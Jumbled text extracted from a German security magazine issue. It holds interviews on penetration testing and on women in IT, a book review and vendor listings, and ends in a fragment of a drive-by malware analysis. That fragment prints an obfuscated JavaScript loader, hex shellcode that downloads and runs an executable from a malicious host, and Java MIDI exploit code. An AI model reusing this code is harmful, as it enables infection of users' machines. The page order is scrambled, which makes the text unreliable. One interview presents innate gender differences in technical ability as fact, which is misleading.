work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 13
Listing 3 Seite bdquohttparestyutecomsadhbdsa879321jbdasindexphprdquo (gekuumlrztes HTML Dokument)
ltbody id=greldm2gt
ltapplet archive=tmpdesjar code=devsAdgredY
width=462 height=255gt
ltparam name=data VALUE=httparestyute
comsadhbdsa879321jbdasl
phpdeserialize=6eampi=1gt
ltparam name=cc value=1gt
ltappletgt
ltbodygt
ltscriptgtvar cmjve3=dltiltih=A2F40Jy=soayQaUab0
=gioltgt~d55003c844047000000
000001000001100200000000000000000D
0035D4266064660005400D10030001A000-
0000410060A)(VcroltB=iillA0A50Cet
beseErsltEe 00000000000D01A
DD0001D100031400400D10084000000003
0060LHehJ)function jvfpb(blktgw)
return blktgwreplace(ig
)replace(~ig)replace(raquo
igStringfromCharCode(0x20x5))
replace(lt95gtigString
fromCharCode(0x2E0x2))
documentwrite(ltpgt1663ltpgt)var
ivypgs3=parseInt(document
getElementById(greldm2)
getElementsByTagName(String
fromCharCode(0x70))[parseInt(String
fromCharCode(0x30))]innerHTML)var
kwjse=for (cqdqdsc = ivypgs3
cqdqdsc gt 0 cqdqdsc--)for (gtkvdm
= ivypgs3-cqdqdsc gtkvdm lt= cmjve3
length gtkvdm=gtkvdm+ivypgs3)
kwjse=kwjse+cmjve3
charAt(gtkvdm)var
fnhld=kwjse+var isguhrd=jvfpb(fn
hld)eval(isguhrd)ltscriptgt
Listing 4a Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
public void init()
shellcode
String str2 = 505351525657559CE8000000005D83ED0D31C06
4034030780C8B400C8B701CAD8B4008EB0
98B40348D407C8B403C5657BE5E0100000
1EEBF4E01000001EFE8D60100005F5E89E
A81C25E010000526880000000FF954E010
00089EA81C25E01000031F601C28A9C356
302000080FB007406881C3246EBEEC6043
20089EA81C24502000052FF95520100008
9EA81C2500200005250FF9
5560100006A006A0089EA81C25E0100005289EA81C278020000526
A00FFD06A0589EA81C25E01000052FF955
A01000089EA81C25E01000052688000000
0FF954E01000089EA81C25E01000031F60
1C28A9C356E02000080FB007406881C324
6EBEEC604320089EA81C24502000052FF9
55201000089EA81C2500200005250FF955
60100006A006A0089EA81C25E010000528
9EA81C2A6020000526A00FFD06
A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C3000
0000000000000000000000000000047657
454656D705061746841004C6F61644C696
272617279410047657450726F634164647
26573730057696E4578656300BB89F289F
730C0AE75FD29F789F931C0BE3C0000000
3B51B02000066AD03851B0200008B70788
3C61C03B51B0200008DBD1F020000AD038
51B020000ABAD03851B0200005
0ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF
3A65974045E43EBE95E93D1E0038527020
00031F69666ADC1E00203851F02000089C
6AD03851B020000C3EB100000000000000
000000000000000000089851B020000565
7E858FFFFFF5F5EAB01CE803EBB7402EBE
DC355524C4D4F4E2E444C4C0055524C446
F776E6C6F6164546F46696C65410070646
67570642E65786500637261736
82E70687000
nops for the nop-slice
String str10 = 90909090
String java_version = SystemgetProperty(java
version)
url
String url = getParameter(data) applet method
int i = 0
int j = 0
while (urlcharAt(i) = )
j += urlcharAt(i)
i += 1
j += 7
j = 256
String checksum = IntegertoHexString(j)
checksum = 6e correct for the url
httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1
if (urlindexOf(deserialize= + checksum) == -1)
return
10201014
FORTGESCHRITTENE
Zusaumltzlich wird noch das oben erwaumlhnte verschleierte JavaScript auf der urspruumlnglichen HTML-Seite geladen Dieses ist noch erstaunlicher denn es enthaumllt gleich ei-ne ganze Ladung von Exploits fuumlr Java Adobe Flash sowie Adobes PDF Reader bereit Der sbquoAuthorlsquo der Sei-te war auf houmlchste Kompatibilitaumlt aus denn auch hier werden nur bestimmte ndash vor allem neuere ndash Versionen der Browser Plugins unterstuumltzt (vgl Listing 5)
Unter httpwwwexploit-dbcomexploits12117 fin-det man eine Beschreibung der Schwachstelle Diese betrifft zusaumltzlich zum analysierten Applet die Java-Ver-sion 160_19
Zusammenfassend laumlsst sich feststellen dass Schadsoftware auf verschiedensten Wegen ins Sys-tem gelangen kann Es ist nicht mehr notwendig Programme zu installieren oder aumlhnliches Die hier beschriebene HTML-Datei koumlnnte auch in einem HTML-faumlhigen E-Mail-Client ausgefuumlhrt werden Ebenso kann die iFrame-Konstruktion in E-Mails platziert werden Es sind nicht nur einzelne Pro-gramme oder PlugIns fuumlr Browser betroffen son-dern es wird versucht gezielt neue Schwachstellen fuumlr mehrere populaumlre Programme zu finden was der letzte Ausschnitt des JavaScript-Codes zeigt Auch
Listing 4b Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
Object localObject1
Object localObject2
Object localObject4
Object localObject5
String str20
String str21
String str22
if ((((java_versionindexOf(160_11) = -1) ||
(java_versionindexOf(160_12) = -1) ||
(java_versionindexOf(160_13) = -1) ||
(java_versionindexOf(160_14) = -1) ||
(java_versionindexOf(160_15) = -1) ||
(java_versionindexOf(160_16) = -1) 1 0) amp
(urlindexOf(i=1) == -1 1 0)) = 0)
Java midi vulnerable see http
vreugdenhilresearchnl201005
java-midi-parse-vulnerabilities
for detailed explaination The author claims that it
was in java 160_19
localObject1 =
localObject1 = repeat( 303)
using windows no return
localObject2 = SystemgetProperty(osname)
toLowerCase()
if (((String)localObject2)indexOf(win) gt= 0)
localObject1 = repeat( 302)
else
return
the core of the vulnerable create a malicious url
and ask javas midiplayer to play
localObject1 = + (String)localObject1 +
ZZZZZZ
try
String str19 = url + 11
localObject4 =
for (int k = 0 k lt str19length() k++)
localObject4 = (String)localObject4 + Integer
toHexString(str19charAt(k))
while (((String)localObject4)length() 8 = 0)
